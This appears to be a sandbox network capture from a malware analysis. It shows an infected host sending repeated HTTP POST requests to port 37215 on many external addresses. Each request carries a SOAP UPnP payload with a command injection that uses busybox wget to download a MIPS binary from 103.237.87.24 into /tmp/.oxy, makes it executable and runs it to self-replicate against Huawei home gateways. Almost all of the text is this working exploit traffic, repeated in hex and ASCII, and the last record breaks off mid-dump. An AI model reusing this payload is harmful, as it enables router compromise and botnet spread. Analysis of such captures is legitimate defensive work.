                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  891192.168.2.1335678197.167.214.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383352995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  892192.168.2.1345744197.180.144.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383363008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  893192.168.2.1359248197.114.123.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383379936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  894192.168.2.1352314197.221.21.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.383388996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  895192.168.2.134659041.135.120.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.385494947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  896192.168.2.135690641.184.38.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.385495901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  897192.168.2.1348424197.24.161.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.385665894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  898192.168.2.1350768157.172.250.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.390496016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  899192.168.2.1336598197.122.128.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.390568972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  900192.168.2.1350936157.71.194.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.390582085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 